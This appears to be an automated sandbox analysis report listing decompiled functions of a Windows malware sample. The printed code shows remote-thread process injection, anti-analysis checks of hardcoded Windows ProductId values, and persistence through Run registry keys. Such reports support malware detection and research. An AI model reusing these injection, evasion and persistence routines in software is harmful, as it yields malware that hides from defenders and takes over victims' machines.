                                    • CharNextA.USER32(00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 004012F9
                                    • CharNextA.USER32(00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401316
                                    • CharNextA.USER32(00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401320
                                    • CharNextA.USER32(00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401349
                                    • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401353
                                    • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401377
                                    • CharNextA.USER32(00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401381
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CharNext
                                    • String ID: "$"
                                    • API String ID: 3213498283-3758156766
                                    • Opcode ID: 69bc44e6375b114957132a77422f8722e1c84a2160c11b934303181ded4122b0
                                    • Instruction ID: 10f63cc1fa669f131e3f68441fcaf6b27babd9536db3b85d99238111a4137022
                                    • Opcode Fuzzy Hash: 69bc44e6375b114957132a77422f8722e1c84a2160c11b934303181ded4122b0
                                    • Instruction Fuzzy Hash: AE21C8446043C059EF316ABA08C07A667C54A1B308B5844BBDAC1FBBF7D47D4887C22E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00403954, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 53libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 58%
                                    			E00403954(void* __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				_Unknown_base(*)()* _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _t20;
				void* _t22;
				void* _t30;
				intOrPtr _t37;
				void* _t40;
				void* _t43;

				_t30 = __ecx;
				_push(__ebx);
				_push(__esi);
				_v8 = __edx;
				_t40 = __eax;
				E00401F38(_v8);
				_push(_t43);
				_push(0x4039f2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t43 + 0xfffffff0;
				_v12 = GetProcAddress(GetModuleHandleA("kernel32"), "Sleep");
				_v20 = GetProcAddress(GetModuleHandleA("kernel32"), "LoadLibraryA");
				_t20 = E004037EC(_t40, 0, _t30, E00401F48(_v8), __edi, _t40); // executed
				_v16 = _t20;
				_t22 = E004038AC(_t40,  &_v20, E00403920, 0, 0xc); // executed
				if(_t22 != 0) {
					CloseHandle(_t22);
				}
				_pop(_t37);
				 *[fs:eax] = _t37;
				_push(E004039F9);
				return E00401AC0( &_v8);
			}













                                    0x00403954
                                    0x0040395a
                                    0x0040395b
                                    0x0040395c
                                    0x0040395f
                                    0x00403964
                                    0x0040396b
                                    0x0040396c
                                    0x00403971
                                    0x00403974
                                    0x0040398e
                                    0x004039a6
                                    0x004039b5
                                    0x004039ba
                                    0x004039cb
                                    0x004039d2
                                    0x004039d5
                                    0x004039da
                                    0x004039de
                                    0x004039e1
                                    0x004039e4
                                    0x004039f1

                                    APIs
                                    • GetModuleHandleA.KERNEL32(kernel32,Sleep,00000000,004039F2), ref: 00403983
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 00403989
                                    • GetModuleHandleA.KERNEL32(kernel32,LoadLibraryA,Sleep,00000000,004039F2), ref: 0040399B
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 004039A1
                                      • Part of subcall function 004037EC: VirtualAllocEx.KERNEL32(?,00000000,00000001,00003000,00000040,00000000,0040386A,?,?,?,?,00000000,00000000,00000000), ref: 00403828
                                      • Part of subcall function 004037EC: WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,00000000,00000001,00003000,00000040,00000000,0040386A), ref: 0040384A
                                      • Part of subcall function 004038AC: CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004038EA
                                      • Part of subcall function 004038AC: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004038FA
                                      • Part of subcall function 004038AC: ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,00000000,000000FF), ref: 0040390D
                                    • CloseHandle.KERNEL32(00000000,00000000,kernel32,LoadLibraryA,Sleep,00000000,004039F2), ref: 004039D5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Handle$AddressMemoryModuleProcProcess$AllocCloseCreateObjectReadRemoteSingleThreadVirtualWaitWrite
                                    • String ID: LoadLibraryA$Sleep$kernel32
                                    • API String ID: 3487503967-1813742806
                                    • Opcode ID: f87daed2c883fae0bc52b1811faf6daf2e3c45671e56467328cf1f20e444393c
                                    • Instruction ID: 3dd456deda738439a9530638aaf5270c0b396e353cabac5e26cfdff56c824f73
                                    • Opcode Fuzzy Hash: f87daed2c883fae0bc52b1811faf6daf2e3c45671e56467328cf1f20e444393c
                                    • Instruction Fuzzy Hash: 01012DB0B40605BED701EFA68C03A5E7EAC9B44716B60497BB400F72D1DB7C9F009A58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004053EC, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E004053EC() {
				char _v264;
				int _v268;
				void* _v272;
				long _t6;
				int _t15;

				_t15 = 0;
				_t6 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1,  &_v268); // executed
				if(_t6 == 0) {
					_v268 = 0x101;
					RegQueryValueExA(_v272, "ProductId", 0, 0,  &_v264,  &_v268); // executed
					if( &_v264 == "76487-644-3177037-23510") {
						_t15 = 1;
					}
				}
				RegCloseKey(_v272);
				return _t15;
			}








                                    0x004053f3
                                    0x00405404
                                    0x0040540b
                                    0x0040540d
                                    0x0040542d
                                    0x0040543b
                                    0x0040543d
                                    0x0040543d
                                    0x0040543b
                                    0x00405443
                                    0x00405451

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1C4,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 00405404
                                    • RegQueryValueExA.ADVAPI32(?,ProductId,00000000,00000000,?,?,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1C4,00000000,0040BF40,00000000), ref: 0040542D
                                    • RegCloseKey.ADVAPI32(00000000,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1C4,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 00405443
                                    Strings
                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 004053FA
                                    • 76487-644-3177037-23510, xrefs: 00405436
                                    • ProductId, xrefs: 00405423
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: 76487-644-3177037-23510$ProductId$Software\Microsoft\Windows\CurrentVersion
                                    • API String ID: 3677997916-300012159
                                    • Opcode ID: 54b8dddc72f5521d94e0edf2fcf669d6ba73802ff5b9393f4314c7fe48c2e6b5
                                    • Instruction ID: 4dbc9aba648d7bbbf83a3552de5bfbcba9719c904d90c9cb7132e047c1fadaca
                                    • Opcode Fuzzy Hash: 54b8dddc72f5521d94e0edf2fcf669d6ba73802ff5b9393f4314c7fe48c2e6b5
                                    • Instruction Fuzzy Hash: 30F08C706403007AE610EA90CC82FDB778CDB40715F50483AFA84FA1D1D6BDE9889A6A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004054A4, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E004054A4() {
				char _v264;
				int _v268;
				void* _v272;
				long _t6;
				int _t15;

				_t15 = 0;
				_t6 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1,  &_v268); // executed
				if(_t6 == 0) {
					_v268 = 0x101;
					RegQueryValueExA(_v272, "ProductId", 0, 0,  &_v264,  &_v268); // executed
					if( &_v264 == "76487-337-8429955-22614") {
						_t15 = 1;
					}
				}
				RegCloseKey(_v272); // executed
				return _t15;
			}








                                    0x004054ab
                                    0x004054bc
                                    0x004054c3
                                    0x004054c5
                                    0x004054e5
                                    0x004054f3
                                    0x004054f5
                                    0x004054f5
                                    0x004054f3
                                    0x004054fb
                                    0x00405509

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1AA,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 004054BC
                                    • RegQueryValueExA.ADVAPI32(?,ProductId,00000000,00000000,?,?,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1AA,00000000,0040BF40,00000000), ref: 004054E5
                                    • RegCloseKey.ADVAPI32(00000000,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1AA,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 004054FB
                                    Strings
                                    • ProductId, xrefs: 004054DB
                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 004054B2
                                    • 76487-337-8429955-22614, xrefs: 004054EE
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: 76487-337-8429955-22614$ProductId$Software\Microsoft\Windows\CurrentVersion
                                    • API String ID: 3677997916-3593519172
                                    • Opcode ID: 2750bd466e02aa405076e09ed9390e2a88f793c938554653eb2e146c9d186da2
                                    • Instruction ID: 47032f9d578e649e4c59a246db62157aaca0609ee869790ecbc754fa5fe81585
                                    • Opcode Fuzzy Hash: 2750bd466e02aa405076e09ed9390e2a88f793c938554653eb2e146c9d186da2
                                    • Instruction Fuzzy Hash: A6F0A7703403007AD610DA94CC82F9B778CDB41714F50443AF944FA1C0D3BDE9489F2A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00406B54, Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 380fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 81%
                                    			E00406B54(intOrPtr __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				intOrPtr* _t106;
				intOrPtr* _t107;
				intOrPtr* _t108;
				intOrPtr* _t109;
				intOrPtr* _t110;
				void* _t112;
				void* _t126;
				intOrPtr* _t143;
				void* _t154;
				void* _t166;
				CHAR* _t169;
				int _t172;
				int _t186;
				intOrPtr* _t190;
				intOrPtr* _t191;
				intOrPtr* _t192;
				intOrPtr* _t193;
				intOrPtr* _t198;
				void* _t200;
				void* _t201;
				intOrPtr* _t204;
				intOrPtr* _t218;
				intOrPtr* _t226;
				intOrPtr* _t240;
				intOrPtr* _t248;
				intOrPtr* _t258;
				intOrPtr* _t272;
				intOrPtr* _t284;
				intOrPtr _t301;
				intOrPtr* _t313;
				void* _t314;
				intOrPtr* _t315;
				intOrPtr* _t317;
				void* _t321;
				intOrPtr* _t332;
				intOrPtr _t333;
				intOrPtr* _t334;
				intOrPtr* _t338;
				char _t340;
				intOrPtr _t351;
				CHAR* _t392;
				CHAR* _t394;
				intOrPtr _t396;
				intOrPtr _t397;
				void* _t402;

				_t393 = __esi;
				_t391 = __edi;
				_t396 = _t397;
				_t314 = 0xf;
				do {
					_push(0);
					_push(0);
					_t314 = _t314 - 1;
				} while (_t314 != 0);
				_push(_t314);
				_push(__esi);
				_push(__edi);
				_t313 = __edx;
				_v8 = __eax;
				E00401F38(_v8);
				_push(_t396);
				_push(0x407061);
				_push( *[fs:eax]);
				 *[fs:eax] = _t397;
				E00401B14(_t313, _v8);
				_t106 =  *0x40d1f0; // 0x40e890
				_t399 =  *_t106;
				if( *_t106 != 0) {
					_t107 =  *0x40d1f0; // 0x40e890
					__eflags =  *_t107 - 1;
					if(__eflags != 0) {
						_t108 =  *0x40d1f0; // 0x40e890
						__eflags =  *_t108 - 2;
						if(__eflags != 0) {
							_t109 =  *0x40d1f0; // 0x40e890
							__eflags =  *_t109 - 3;
							if(__eflags != 0) {
								_t110 =  *0x40d218; // 0x40e894
								_t112 = E00401D50( *_t110);
								_t332 =  *0x40d218; // 0x40e894
								_t333 =  *_t332;
								__eflags =  *((char*)(_t333 + _t112 - 1)) - 0x5c;
								if( *((char*)(_t333 + _t112 - 1)) != 0x5c) {
									_t301 =  *0x40d218; // 0x40e894
									E00401D58(_t301, 0x407078);
								}
								_t334 =  *0x40d218; // 0x40e894
								E00401B58( &_v12,  *_t334);
								E00401CAC( &_v28, E00401F48(_v12));
								E00406684(_v28, _t313, __eflags);
							} else {
								E004061DC( &_v12, _t313, __esi, __eflags);
							}
						} else {
							E00406034( &_v12, _t313, __eflags);
						}
					} else {
						E00405F7C( &_v12, _t313, __eflags);
					}
				} else {
					E00405EF0( &_v12, _t313, _t399);
				}
				if( *((char*)(_v12 + E00401D50(_v12) - 1)) != 0x5c) {
					E00401D58( &_v12, 0x407078);
				}
				_t338 =  *0x40d208; // 0x40e898
				E00401D58( &_v12,  *_t338);
				_t126 = E00401D50(_v12);
				_t340 = _v12;
				_t401 =  *((char*)(_t340 + _t126 - 1)) - 0x5c;
				if( *((char*)(_t340 + _t126 - 1)) != 0x5c) {
					E00401D58( &_v12, 0x407078);
				}
				_t315 =  *0x40d20c; // 0x40e89c
				E00401D9C( &_v16,  *_t315, _v12);
				E00401CAC( &_v32, E00401F48(_v12));
				E00406684(_v32, _t313, _t401); // executed
				E00401CAC( &_v36, E00401F48(_v16));
				E00405A28(_v36, _t313, _t391, _t393, _t401); // executed
				E00405BEC( &_v40, _t313, _t393, _t401); // executed
				_push(_v40);
				_push(0x407078);
				_t143 =  *0x40d208; // 0x40e898
				_push( *_t143);
				E00401E10();
				_t402 =  *((char*)(_v20 + E00401D50(_v20) - 1)) - 0x5c;
				if(_t402 != 0) {
					E00401D58( &_v20, 0x407078);
				}
				_t317 =  *0x40d20c; // 0x40e89c
				E00401D9C( &_v24,  *_t317, _v20);
				E00404740(_v16, _t313,  &_v44, _t391, _t393, _t402);
				_push(_v44);
				E00404740(_v8, _t313,  &_v48, _t391, _t393, _t402);
				_pop(_t154);
				E00401E94(_t154, _v48);
				if(_t402 == 0) {
					L21:
					E00401B14(_t313, _v8);
					goto L40;
				} else {
					E00404740(_v24, _t313,  &_v52, _t391, _t393, _t402);
					_push(_v52);
					E00404740(_v8, _t313,  &_v56, _t391, _t393, _t402);
					_pop(_t166);
					E00401E94(_t166, _v56);
					if(_t402 != 0) {
						_t169 = E00401F48(_v16);
						_t394 = E00401F48(_v8);
						_t172 = CopyFileA(_t394, _t169, 0);
						__eflags = _t172 - 1;
						asm("sbb eax, eax");
						__eflags = _t172 + 1 - 1;
						if(_t172 + 1 != 1) {
							E00401CAC( &_v60, E00401F48(_v20));
							E00406684(_v60, _t313, __eflags);
							_t392 = E00401F48(_v24);
							E00401CAC( &_v64, _t392);
							E00405A28(_v64, _t313, _t392, _t394, __eflags);
							_t186 = CopyFileA(_t394, _t392, 0);
							__eflags = _t186 - 1;
							asm("sbb eax, eax");
							__eflags = _t186 + 1 - 1;
							if(_t186 + 1 != 1) {
								E00401B14(_t313, _v8);
							} else {
								E00401B14(_t313, _v24);
							}
						} else {
							E00401B14(_t313, _v16);
						}
						_t190 =  *0x40d1ec; // 0x40e8ac
						__eflags =  *_t190;
						if( *_t190 != 0) {
							_t248 =  *0x40d1ec; // 0x40e8ac
							E00401CAC( &_v72, E00401F48( *_t248));
							E00406088(0x80000002, _t313, _v72, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", _t394, __eflags,  &_v68, 0);
							E00401E94(_v68,  *_t313);
							if(__eflags != 0) {
								E00401CAC( &_v76, E00401F48( *_t313));
								_t284 =  *0x40d1ec; // 0x40e8ac
								E00401CAC( &_v80, E00401F48( *_t284));
								E00405C4C(0x80000002, _t313, _v80, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", _t394, __eflags, _v76);
							}
							_t258 =  *0x40d1ec; // 0x40e8ac
							E00401CAC( &_v88, E00401F48( *_t258));
							E00406088(0x80000001, _t313, _v88, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", _t394, __eflags,  &_v84, 0);
							E00401E94(_v84,  *_t313);
							if(__eflags != 0) {
								E00401CAC( &_v92, E00401F48( *_t313));
								_t272 =  *0x40d1ec; // 0x40e8ac
								E00401CAC( &_v96, E00401F48( *_t272));
								E00405C4C(0x80000001, _t313, _v96, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", _t394, __eflags, _v92);
							}
						}
						_t191 =  *0x40d1d8; // 0x40e8a4
						__eflags =  *_t191;
						if( *_t191 != 0) {
							_t226 =  *0x40d1d8; // 0x40e8a4
							E00401CAC( &_v104, E00401F48( *_t226));
							E00406088(0x80000002, _t313, _v104, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t394, __eflags,  &_v100, 0);
							E00401E94(_v100,  *_t313);
							if(__eflags != 0) {
								E00401CAC( &_v108, E00401F48( *_t313));
								_t240 =  *0x40d1d8; // 0x40e8a4
								E00401CAC( &_v112, E00401F48( *_t240));
								E00405C4C(0x80000002, _t313, _v112, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t394, __eflags, _v108);
							}
						}
						_t192 =  *0x40d1e0; // 0x40e8a8
						__eflags =  *_t192;
						if( *_t192 != 0) {
							_t204 =  *0x40d1e0; // 0x40e8a8
							E00401CAC( &_v120, E00401F48( *_t204));
							E00406088(0x80000001, _t313, _v120, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t394, __eflags,  &_v116, 0);
							E00401E94(_v116,  *_t313);
							if(__eflags != 0) {
								E00401CAC( &_v124, E00401F48( *_t313));
								_t218 =  *0x40d1e0; // 0x40e8a8
								E00401CAC( &_v128, E00401F48( *_t218));
								E00405C4C(0x80000001, _t313, _v128, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t394, __eflags, _v124);
							}
						}
						_t193 =  *0x40d1e4; // 0x40e8a0
						__eflags =  *_t193;
						if( *_t193 != 0) {
							_push(0x4070fc);
							_push(E00406840(1));
							_push(E00401F48( *_t313));
							_t198 =  *0x40d1e4; // 0x40e8a0
							_t200 = E00401F48( *_t198);
							_pop(_t321);
							_pop(_t201);
							E00406ADC(_t201, _t321, _t200, __eflags);
						}
						L40:
						_pop(_t351);
						 *[fs:eax] = _t351;
						_push(E00407068);
						return E00401AE4( &_v128, 0x1f);
					}
					goto L21;
				}
			}















































































                                    0x00406b54
                                    0x00406b54
                                    0x00406b55
                                    0x00406b57
                                    0x00406b5c
                                    0x00406b5c
                                    0x00406b5e
                                    0x00406b60
                                    0x00406b60
                                    0x00406b63
                                    0x00406b65
                                    0x00406b66
                                    0x00406b67
                                    0x00406b69
                                    0x00406b6f
                                    0x00406b76
                                    0x00406b77
                                    0x00406b7c
                                    0x00406b7f
                                    0x00406b87
                                    0x00406b8c
                                    0x00406b91
                                    0x00406b94
                                    0x00406ba3
                                    0x00406ba8
                                    0x00406bab
                                    0x00406bba
                                    0x00406bbf
                                    0x00406bc2
                                    0x00406bce
                                    0x00406bd3
                                    0x00406bd6
                                    0x00406be2
                                    0x00406be9
                                    0x00406bee
                                    0x00406bf4
                                    0x00406bf6
                                    0x00406bfb
                                    0x00406bfd
                                    0x00406c07
                                    0x00406c0c
                                    0x00406c14
                                    0x00406c1c
                                    0x00406c2e
                                    0x00406c36
                                    0x00406bd8
                                    0x00406bdb
                                    0x00406bdb
                                    0x00406bc4
                                    0x00406bc7
                                    0x00406bc7
                                    0x00406bad
                                    0x00406bb0
                                    0x00406bb0
                                    0x00406b96
                                    0x00406b99
                                    0x00406b99
                                    0x00406c4b
                                    0x00406c55
                                    0x00406c55
                                    0x00406c5d
                                    0x00406c65
                                    0x00406c6d
                                    0x00406c72
                                    0x00406c75
                                    0x00406c7a
                                    0x00406c84
                                    0x00406c84
                                    0x00406c89
                                    0x00406c97
                                    0x00406ca9
                                    0x00406cb1
                                    0x00406cc3
                                    0x00406ccb
                                    0x00406cd3
                                    0x00406cd8
                                    0x00406cdb
                                    0x00406ce0
                                    0x00406ce5
                                    0x00406cef
                                    0x00406cff
                                    0x00406d04
                                    0x00406d0e
                                    0x00406d0e
                                    0x00406d13
                                    0x00406d21
                                    0x00406d2c
                                    0x00406d34
                                    0x00406d3b
                                    0x00406d43
                                    0x00406d44
                                    0x00406d49
                                    0x00406d70
                                    0x00406d75
                                    0x00000000
                                    0x00406d4b
                                    0x00406d51
                                    0x00406d59
                                    0x00406d60
                                    0x00406d68
                                    0x00406d69
                                    0x00406d6e
                                    0x00406d84
                                    0x00406d92
                                    0x00406d95
                                    0x00406d9a
                                    0x00406d9d
                                    0x00406da0
                                    0x00406da2
                                    0x00406dbd
                                    0x00406dc5
                                    0x00406dd2
                                    0x00406dd9
                                    0x00406de1
                                    0x00406dea
                                    0x00406def
                                    0x00406df2
                                    0x00406df5
                                    0x00406df7
                                    0x00406e0a
                                    0x00406df9
                                    0x00406dfe
                                    0x00406dfe
                                    0x00406da4
                                    0x00406da9
                                    0x00406da9
                                    0x00406e0f
                                    0x00406e14
                                    0x00406e17
                                    0x00406e23
                                    0x00406e34
                                    0x00406e46
                                    0x00406e50
                                    0x00406e55
                                    0x00406e63
                                    0x00406e6c
                                    0x00406e7d
                                    0x00406e8f
                                    0x00406e8f
                                    0x00406e9a
                                    0x00406eab
                                    0x00406ebd
                                    0x00406ec7
                                    0x00406ecc
                                    0x00406eda
                                    0x00406ee3
                                    0x00406ef4
                                    0x00406f06
                                    0x00406f06
                                    0x00406ecc
                                    0x00406f0b
                                    0x00406f10
                                    0x00406f13
                                    0x00406f1b
                                    0x00406f2c
                                    0x00406f3e
                                    0x00406f48
                                    0x00406f4d
                                    0x00406f5b
                                    0x00406f64
                                    0x00406f75
                                    0x00406f87
                                    0x00406f87
                                    0x00406f4d
                                    0x00406f8c
                                    0x00406f91
                                    0x00406f94
                                    0x00406f9c
                                    0x00406fad
                                    0x00406fbf
                                    0x00406fc9
                                    0x00406fce
                                    0x00406fdc
                                    0x00406fe5
                                    0x00406ff6
                                    0x00407008
                                    0x00407008
                                    0x00406fce
                                    0x0040700d
                                    0x00407012
                                    0x00407015
                                    0x00407017
                                    0x00407028
                                    0x00407030
                                    0x00407031
                                    0x00407038
                                    0x0040703f
                                    0x00407040
                                    0x00407041
                                    0x00407041
                                    0x00407046
                                    0x00407048
                                    0x0040704b
                                    0x0040704e
                                    0x00407060
                                    0x00407060
                                    0x00000000
                                    0x00406d6e

                                    APIs
                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00406D95
                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00406DEA
                                      • Part of subcall function 00406088: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 004060DD
                                      • Part of subcall function 00406088: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 00406101
                                      • Part of subcall function 00406088: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001), ref: 0040612B
                                      • Part of subcall function 00406088: RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 0040613F
                                      • Part of subcall function 00405C4C: RegCreateKeyA.ADVAPI32(?,00000000,?), ref: 00405C92
                                      • Part of subcall function 00405C4C: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000002,00000000,00000000,00000000,00405CF1), ref: 00405CBA
                                      • Part of subcall function 00405C4C: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000002,00000000,00000000,00000000,00405CF1), ref: 00405CC9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Value$CloseCopyFileQuery$CreateOpen
                                    • String ID: 4h@$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run$Software\Microsoft\Windows\CurrentVersion\Run
                                    • API String ID: 1469814539-1189044031
                                    • Opcode ID: 1733ce09272f468f8cee265a2a4fb179a50cdf102672fd97dcfc76b335fe8140
                                    • Instruction ID: 0337d0d0e41828abccd6a10b42b8af73d9b7eafca3f8209fdc2fdaca8a3f3fd1
                                    • Opcode Fuzzy Hash: 1733ce09272f468f8cee265a2a4fb179a50cdf102672fd97dcfc76b335fe8140
                                    • Instruction Fuzzy Hash: 13E1FC34A041099FDB11EBA9C881A9EB3B5AF45308F60417BF405BB2F6DB38AD45CB59
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004019D8, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 31%
                                    			E004019D8() {
				struct HINSTANCE__* _t24;
				intOrPtr _t32;
				void* _t42;

				if( *0x0040E5BC != 0 ||  *0x40e024 == 0) {
					L3:
					if( *0x40d004 != 0) {
						 *0x40d068();
					}
					L5:
					while(1) {
						if( *((char*)(0x40e5bc)) == 2 &&  *0x40d000 == 0) {
							 *0x0040E5A0 = 0;
						}
						 *0x40d030();
						if( *((char*)(0x40e5bc)) <= 1 ||  *0x40d000 != 0) {
							if( *0x0040E5A4 != 0) {
								 *0x40d01c();
								_t32 =  *((intOrPtr*)(0x40e5a4));
								_t7 = _t32 + 0x10; // 0x0
								_t24 =  *_t7;
								_t8 = _t32 + 4; // 0x400000
								if(_t24 !=  *_t8 && _t24 != 0) {
									FreeLibrary(_t24);
								}
							}
						}
						 *0x40d034();
						if( *((char*)(0x40e5bc)) == 1) {
							 *0x0040E5B8();
						}
						if( *((char*)(0x40e5bc)) != 0) {
							E004019A8();
						}
						if( *0x40e594 == 0) {
							if( *0x40e014 != 0) {
								 *0x40e014();
							}
							ExitProcess( *0x40d000); // executed
						}
						memcpy(0x40e594,  *0x40e594, 0xb << 2);
						_t42 = _t42 + 0xc;
						0x40d000 = 0x40d000;
					}
				} else {
					do {
						 *0x40e024 = 0;
						 *((intOrPtr*)( *0x40e024))();
					} while ( *0x40e024 != 0);
					goto L3;
				}
			}






                                    0x004019ef
